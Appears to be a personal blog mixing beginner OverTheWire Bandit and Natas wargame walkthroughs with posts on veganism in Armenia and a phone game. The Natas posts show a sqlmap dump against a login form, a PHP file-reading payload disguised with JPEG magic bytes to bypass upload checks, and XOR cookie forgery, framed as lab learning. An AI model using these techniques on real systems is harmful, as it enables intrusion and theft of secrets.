The art of understanding the problem

Hey there,

These days I’m concentrating myself on improving my hacking skills, because I can’t afford this dream of mine to stay on my journals, some dreams have to come true. I read, I try to hack some servers (there is nothing illegal, mum), I blog about my solutions, I blog about the way I search the solutions, because I’m only a beginner in the field, not an expert – beginner.

I was too suspicious about my abilities. I always am. Sometimes I challenge myself in order to show the girl in the mirror that she can, sometimes I ask for an opinion from someone who knows me better than I know myself. I will never take up a task or a job out my ability scope. So, in order to avoid a situation like that I always update my knowledge about my skills.

The 5th of November should be marked on my calendar. Today I found out that I’ve finally learnt to understand the problem. As a beginner hacker I would always worry about the solution not even understanding the core problem or the task itself. Today, as I was doing one of the levels of OverTheWire-Bandit, I had no idea which command should be used, the only thing I knew was that the file contains a human-readable string.

What would a beginner do in this case? Of course, I googled how to find a human readable string in a file. And there was the solution:

strings somebinaryfile | grep textuwanttofind

Maybe you’ll think: “WTF, nothing serious, you haven’t discovered anything girl, you’ve just googled about it and copy-pasted the solution”. For me this is a relevant point on my learning path, because I finally googled the problem not the solution.

Before finding that link I read so many man pages of strings or grep and learnt some things I had no idea about. Anyway, I learnt the art of reading and understanding the problem. And didn’t worry about the solution.

So, if you are beginner, this can be a good tip for you: never worry about finding the password of this or that level. Maybe you will never be able to find the password, but the reading, the research that you do, the knowledge you gain, will help you to become the specialist you want to be. Try to understand the main problem of the task and don’t give up until you solve it.

 thought it’s supposed to be easier…

Today I solved Bandit 6 → 10 levels

Hey there,

I had so much fun solving bandit levels and blogging about it, so I decided to make it a habit and see if I can solve all the levels till the end of the year. Now, without further ado, we pick up from where we stopped last time.

Bandit Level 5 → 6

Our task is to find the file which is human-readable, 1033 bytes in size and is not executable. I assume, that the command, that will help us today is the find. So, I’m gonna see what is find for and what other options it has. I found -executable, which is probably one of the commands I need right now, but I’m still looking for the way to filter by its size and see if it’s human readable. Awesome, there is -size command and we should pay attention that for bytes we should use c. I found the directory named “inhere” which contains too many directories. In order to save time and not to check every directory I just stay in “inhere” and do:

find -size 1033c

It shows me the only file that is 1033 bytes: /maybehere07/.file2, so I cat the file. There is the password!

Bandit Level 6 → 7

This level seems to be harder at the first sight, because it’s the first time I should find a file owned by another user. It’s hard but not possible. Let’s dig in. In order to find a file owned by a user or a group I just type:

find -user bandit7 -group bandit6

and for the size, as we learnt from the previous level, we need -size 33c. No result. Let’s read the task again. The password is stored somewhere on the server. So we should look for it everywhere.

find / -user bandit7 -group bandit6 -size 33c.

Oh no, it shows all the errors as well. We don’t need them at all, so let’s redirect all of them in /dev/null.

ind / -user bandit7 -group bandit6 -size 33c 2>/dev/null

Success!! There is the file we were looking for. And it contains the password for the next level.

Bandit Level 7 → 8

The password is in the file named data.txt next to the word millionth. I guess I should find out how to find a word in a file. Here is the solution. So I just type:

grep millionth data.txt

This was such a child’s play.

Bandit Level 8 → 9

The password for the next level is stored in the file data.txt and is the only line of text that occurs only once. The key word is “occurs only once”, it seems kind of unique, right? What a pleasant coincidence, we have a command called uniq. On the man page of uniq I found this awesome option:

-u, --unique
     only print unique lines

I see that sort command that can be used for the level. What does it stand for? The man page says:

sort - sort lines of text files

Also, the helpful reading material suggests that we should read about piping and redirection. After looking through the material I try this:

cat data.txt | sort | uniq -u

And there is our password. Another, more sufficient way would have been:

sort data.txt | uniq -u

Bandit Level 9 → 10

The password for the next level is stored in the file data.txt in one of the few human-readable strings, preceded by several = characters. I understand that my task is to find the human-readable string in a file. Here I found the most efficient and maybe the only way:

strings data.txt | grep "= "

Success! The password is on my screen already!

For me these levels were easier than the previous ones. Maybe because I’ve already learnt the art of understanding the problem and reading every possible man or –help page.

I thought it’s supposed to be easier…

Happy International Vegan day!

hey there,

It’s been almost three years I’m following vegan lifestyle and today I would like to talk about my experience, pros and cons of being a vegan in Armenia, a country where mostly all national dishes are, to put it mildly, non vegan-friendly.

Before saying bye-bye to meat and dairy products, I read hundreds of articles and watched thousands of videos. Most of them would say “it’s not a one day plan, no one can become vegan in a day, you should start with baby steps, become a vegetarian first, and then see the reaction of your body…”. For me it took like a second, there was kind of a click in my head. I was watching a ted talk about food marketing and meat production and I just said “I’m becoming a vegan”. I’ve not eaten meat or drunk non-plant-based milk from that moment.

I was living in Germany at that time and it didn’t feel like a huge step, it was normal there, I wasn’t seen like an alien. I could go to a supermarket and find the vegan section, buy soy milk produced a day before. A week after becoming a vegan I traveled to Amsterdam and I found a vegan-friendly store at every corner of the city: vegan cookies, vegan chocolate, vegan sausage? OMG, people!!! I was happy.

Vegan breakfast in Amsterdam

Then I moved back to Armenia. And here all the colors seemed gray and green was not even mentioned. Eat some dolma (meat wrapped in cabbage), here is some barbeque, enjoy the meat, your body needs protein… And I kind of was seen as someone following to fashion, someone who says she is vegan, because that’s a way to show off or pretend she is unique. Frankly, that hurt.

One day Antranig found a store, where I could buy soy milk, and that was one of the happiest days of my life. Of course, I’m not the only vegan here in Armenia, but there was not much of demand for vegan products, and the milk we bought was produced like three-four months ago.

Found my first plant based milk in Yerevan

These days it has become much better. I can buy plant based milk in every store, we’ve even found vegan cookies, which I love, most cafes and restaurants have updated their menus, and you can see that little “leaf” sign, which means the dish is vegan friendly. And there are already three vegan cafes (don’t dare to laugh), where you can find every kind of delicious food: pizza, salads, soup and even famous Armenian traditional dishes, like the above mentioned dolma (of course, made with a vegan recipe).

I’ve started to cook more and explored new vegan recipes, found amazing food bloggers. Marianna is from Armenia. She and her husband Garik Papoyan, who is a famous musician here have been vegans for like five years already which made them one of the first vegans in the country. I’ve tried Marianna’s recipe of vegan omelet and loved it. Another famous vegan food blogger is pick up limes . Saying I love their work and passion will be saying nothing. I’ve tried most of their recipes while living in Germany (sadly, it’s not easy to find all the products here, and it costs a fortune to buy 100 grams of tofu for example).

Vegan homemade cookies

My struggle is not done, unfortunately. People look, they stare, they ask, I explain, they laugh, I smile, they talk, I don’t care. As every change and every new thing, this also needs time for people to adjust. I’ll live and I’ll see the day, when you don’t have to ask, if they have plant based milk for the coffee, you are sure they do. Who knows, maybe they will even ask: “what kind of milk do you prefer”? John Lennon would say: “You may say I’m a dreamer, but I’m not the only one….”

I thought it’s supposed to be easier…

How I tried to solve OverTheWire – Bandit 0 → 5

hey there,

I had some energy for doing some bandit levels today and I thought it would be nice to share all bandit levels with you. As always, I’m not gonna spoil it for you with passwords, this is just a walkthrough. My coffee is ready, so let’s dig in.
Bandit Level 0 
The sole goal of this level is to learn how to connect to another server using ssh. There are four relevant points here. We need the Host name / Site’s IP Address / Domain Name / Server Address, Username, Password and Port Number.
For this level our Host name is: bandit.labs.overthewire.org
Username: bandit0
Password: bandit0
Port Number: 2220
Let’s connect to the server and log into the game. The syntax we need is the following: ssh username@hostname -p Port Number
If you’ve done it right, you’ll be asked a password and you just have to  type bandit0.
Enjoy your stay!
Bandit Level 0 → 1
For this level you should learn some unix commands, especially the ls and cat commands. For me, as a beginner, the most important command in Unix is –help. So as always, I just type ls –help and it tells me the usage and that ls shows the list information about the files. There is only a file named “readme”. For reading a file we need the “cat” command, which is for ….. cat –help concatenating the files. I love it how every command is kind of an abbreviation. Now you just need to type cat and the name of the file you want to read. Wow! Here is our password. OK, that was easy, let’s jump on the next level. 
A quick tip, before passing to level 2: always save the passwords on a sticky note.
Bandit Level 1 → 2
After connecting to this server the same way as we’ve done on bandit 0, we list the files (ls) and see there is a file named “-“. Let’s try to cat the file the way we already know. Nothing happens, it requires an input. So there is probably another way to concatenate a file named “-“. First of all do ctrl + C to get out of that madness. cat –help gives us nothing, sad… OK, let’s google it, because… another wise thought alert, if you have a problem, it means somewhere in the world someone should have had that problem as well and most probably there is a solution for that.  I found this.
Problem is solved. We have the password for the next level. Saaaaaavviiiing it and going to the next level.
Bandit Level 2 → 3
Hah! This is fun. We have a file that is literally named “spaces in this filename”. There should be way to help the system to understand that “spaces in this filename” is just a file, not four files.

-Hello Google, how to cat a file that has spaces in the name

-Hello coffee, here are about 20,100,000 results (0.57 seconds)
-You are such a show off, but thanks
So it turned out you need quoting AKA ‘ ‘.
Level 3 was not hard at all either.
Bandit Level 3 → 4
Yey! This one is kind of tricky. After listing the files we find a directory. Here we need a new command named cd (Change the shell working Directory). Awesome, right? We try to list the files and this directory and there is nothing but emptiness. C’mmon you promised, even the name of the directory says “Inhere”. What if the file is hidden? How to list the hidden files? We need a help, no, actually we need THE help. ls -a will list all the files, even the ones, that start with a . AKA the hidden files. .hidden file is found, what are you waiting for?
Bandit Level 4 → 5
What do I see? Again an “Inhere” directory, which has not one, not two but ten files. Sure, I can read all of them and find that desired password, but something inside me tells me: “There should be a way to cat all the files, go and find that way”. Here I found a part of our problem, i.e. how to cat all the files: we need to use “*”. But let’s pay attention that all the files start with a “-“. Bringing all our knowledge together and typing  cat ./* we decide that it would have been easier to cat all the files. How do I find the password in this symbol-mixture? I just tried to brute force. No way, there are more letters than I needed. Keeping up with the Kardashians Google. What if we find out which file contains text and then just read it? That is possible with the file command: file ./* This will tell us that only the file named -file07 contains ASCII text. Let’s just read that one.
Aaaand done!
I thought it’s supposed to be easier…

OverTheWire – Natas 14

OverTheWire – Natas 14OverTheWire – Natas 14

OverTheWire – Natas 14

OverTheWire – Natas 14

an experiment

 hey, 

most probably you have already heard that the success is nothing than a result of ongoing hard work and patience. I have heard, read and said this for thousands of times, but my either laziness or lack of patience had never let me see or feel it on my own. 

This year in March I received my first iPhone. I used to be “an Android girl”, and I was pretty sure that iOS would never be a part of my life. Yet, I’m studying iOS development now. Anyways, after installing all the  necessary software on the new phone I installed a game, a really funny one – Fishdom by Playrix. I was kind of hooked on it, could play for hours until I didn’t feel my fingers. The concept is lovely; you buy fish, you feed them, you design their aquarium, and you play more, and buy more, discover new worlds and new aquariums. Some levels are terribly hard, I could be stuck on the same level for days and I would go crazy but I always kept trying and not a level was unbeatable. 

Yesterday, for the first time in these eight months I came the first in the gold league. That meant something to me so please laugh but not so loudly. 

You know I’m always looking to find something between the lines. So here, this game came as a proof that if you are devoted, if you keep struggling, if you try hard, one day you’ll collect enough marbles and you’ll be the first. 

I thought it’s supposed to be easier…

go hack yourself

 hey there, 

so I got this pin (btw sent from Defcon) and I loved it. 

 for me hacking is not only about looking for a vulnerability and cracking the system. mostly I see it as the most creative way you can approach to the problem, think differently, finding the point that is not wanted to be found, acting unexpectedly. and what’s the point of these actions? at least for me the only goal is the improvement of the safety of the system you are about to hack. 

I caught myself on the thought that all my life I’ve brought myself to the level of being cracked to find the vulnerable side of mine in order to be able to improve it, to make it and myself more secure, I’ve put myself in a situation I’m not ready at all to see how I react. for me that’s the only way of self-consciousness, of course along with meditation and yoga. 

so, maybe you’ll see a pun here and a swearing word, meanwhile this is not offensive at all (pun intended). this can be understood as a motto about knowing yourself and hacking your mind. 

go hack yourself

I can’t believe I solved OverTheWire – Natas level 14

hey you!

I love Natas people! I’ll tell you why a bit later. open the sourcecode. it says: if(mysql_num_rows(mysql_query($query, $link)) > 0) {  and many other lines. I even didn’t pay attention to those. I got what I needed. mySQL !!! 

twenty minutes ago, I had no idea about SQL. I had only heard about it while going through some books about web application pentesting. so my gut told me: “c’mmon, go and learn what it is after all”. this tutorial was more than enough for this level.

what I did is assuming that the username should be natas15 and tried to login. oh, my lovely burp suite. intercept is on 🙂  what we find here:

POST /index.php HTTP/1.1
Host: natas14.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://natas14.natas.labs.overthewire.org
Authorization: Basic bmF0YXMxNDpMZzk2TTEwVGRmYVB5VkJrSmRqeW1ibGxRNUw2cWRsMQ==
Connection: close
Referer: http://natas14.natas.labs.overthewire.org/
Cookie: __utma=176859643.2101260650.1648221880.1648222577.1648226688.3; __utmz=176859643.1648222577.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)
Upgrade-Insecure-Requests: 1
username=natas15&password=testpassword
I just copy-pasted this in a new file called: natas15. the rest is on sqlmap and here we type:
sqlmap -r natas15 -p username
and then say “yes” to every question: y, y, y, y… for more info, we add: sqlmap -r natas15 -p username –dump and run again. here comes the sun fun.
don’t get disappointed if the username natas15 doesn’t work. try the others as well. hey, you obviously know how to use sqlmap. <3
I thought it’s supposed to be easier… 

OverTheWire – Natas level 13 was not that hard

hey there,

people learn from their mistakes, so does Natas. They have heard that instead of .jpg we were able to upload any file, so they just made some changes and “improved” their security for this level. have they even heard about magic numbers? today they are gonna do their magic for us.

first just open your terminal and hexdump any .jpg file.  I have just found this cutie in my laptop, so gonna see how .jpg files differ from the other ones.  so, I’m gonna type: xxd -C nameofthephoto.jpg

pay attention to the first bites of the hexdump:ffd8 ffe0 00
these are the magic numbers for .jpg. and they are here for us today. we can convince the server that the file, that we are uploading, is a pure .jpg as it wishes. (ssshhh, don’t tell anyone, we are going to upload a wonderful .php that will lead us to our password)
do you remember the script (natas13.php) that we wrote together for the last level ? bring it back, we need it today as well. you have to make some changes though:

<?php
echo file_get_contents( “/etc/natas_webpass/natas14 “);
?>

and now let’s make a .jpg file just to have the magic numbers in it: 

echo -e “xffxd8xffxe0n” > newfile.jpg

we should merge these two files: 

cat natas13.php >> newfile.jpg

the rest is the same. upload the file, change the name into .php (now you like burp suite more, right?) and enjoy the moment. come back for the next level.

I thought it’s supposed to be easier…

Today I solved OverTheWire – Natas level 12

hey there, 

the older we get the harder the life is. here in OverTheWire it’s a bit different. so level 12 is much easier if you’ve already passed the other 11 levels. (Good for you, by the way! what a journey, huh?!)

have you already read the script? actually, there is nothing new for us. we can get the same from the page: you should upload a .jpg file not bigger than 1KB. let’s try it. 

before that, do you have burp suite? you’re gonna need it. I should  confess, at first I hated it. now it’s one of my best friends. please, download it and come back…I’ll wait. if you have it already, you need to know how it works, right? Here I’ve found a tutorial for you to be quick, but I’ve learned it and in like 5 hours with this crazy guy.

I made just a random .txt file and tried to upload it to see what is happening when you don’t upload the required .jpeg. 

Have you noticed? it has transferred it into .jpg. Let’s see if we can transfer it into .txt again. and click on the uploaded file: 

voila! it reads the text file. this is so bad… so bad… this is my friend File inclusion vulnerability. what if we create a PHP file because we know that the server supports PHP. no worries, this is going to be easy, you just need one command: file_get_contents, and we already know where the password is right: /etc/natas_webpass/natas13. it should look like this: 

<?php
echo file_get_contents( “/etc/natas_webpass/natas13 “);

save the file as natas12.php and upload it. then just go back to your close friend burp suit and change the .jpg into .php, click forward. what do you think? what will happen if you open the uploaded file? do it yourself, I trust you! see you on the next level.
 
I thought it’s supposed to be easier…

How I suffered to hack OverTheWire – Natas level 11

hey there,

so you have already passed all the previous levels, congrats, you are good to go! it’s getting a bit complicated from now on. No worries! I’m here to make it easier for you. Now we are on level 11, and I hope you have the password.

What do we see here?

you already know what to do, right? let’s see what the sourcecode says:
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
$key = '<censored>';
$text = $in;
$outText = '';

// Iterate through each character
for($i=0;$i<strlen($text);$i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}

    return $outText;
}

$defaultdata array contains two values: showpassword and bgcolor. (you do see that “no”, do you? we are gonna change that to “yes”)
what is on the next line? xor_encrypt? what a new hell is this? let me explain: XOR Encryption is like two salads with one same ingredient – the key. in both cases (Encryption and Decryption) the key stays the same. if the plain text has the same length as the key, it’s used once, if not – key is repeated. here I’ve found a very simple explanation of the concept for you.
now that we know what xor encryption means, let’s go on and look at the rest of the sourcecode.
function loadData($def) {
global $_COOKIE;
$mydata = $def;
if(array_key_exists("data", $_COOKIE)) {
$tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
if (preg_match('/^#(?:[a-fd]{6})$/i', $tempdata['bgcolor'])) {
$mydata['showpassword'] = $tempdata['showpassword'];
$mydata['bgcolor'] = $tempdata['bgcolor'];
}
}
}
return $mydata;
what does it say? look at the 5th line.
$tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE[“data”])), true);
hah! Cookie? So we must pay attention to the cookies, there should be something for us.


"Cookies are protected with XOR encryption" says the page. not only that, if you've already paid some attention, $tempdata has played some games: json_decode,  xor_encrtpt and then base64_decode. What we can do is to start from the end. 

1) base64 decoding our favorite line of the cookies (base64 -d)
2) in order to be able to do some xor_encrtypt, we need a hexdump, so
3) base64 -d | xxd -p
note: you’ll see %3D at the end of the cookie, which is URL encoding, basically it is  a =, so replace that part with =.
the result should look like this:
4) now we have the output of our xor_encrypt and we need the plain text to be able to find out the key.
here comes some php coding copy-pasting (don’t worry if you can’t code in php and remember, you just need to understand what’s written in there)
just create a php file and type or copy-paste the following.

<?php

$in = array( “showpassword”=>”no”, “bgcolor”=>”#ffffff”);

print(json_encode($in));

?>

the output is going to be our input for the XOR encryption.

{“showpassword”:”no”,”bgcolor”:”#ffffff”}

the world is full of encrypting – decrypting websites. here is one:
voila! we have our key: qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
if you remember, I have already told you, that in case the key is short, it is repeated. so the exact key is: qw8J
our crazy mind says: go and copy some other code out there.
go back to your php file and do some edits. I had told you we were gonna make the “no” into a very nice “yes”.
execute the file, and you will see a whole another cookie there:

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

what is required is to replace the previous one with this new, much better one. and please, don’t forget to add %3D at the end. the rest is on you! enjoy the moment of seeing the password on your screen. you deserve it! 

I thought it’s supposed to be easier…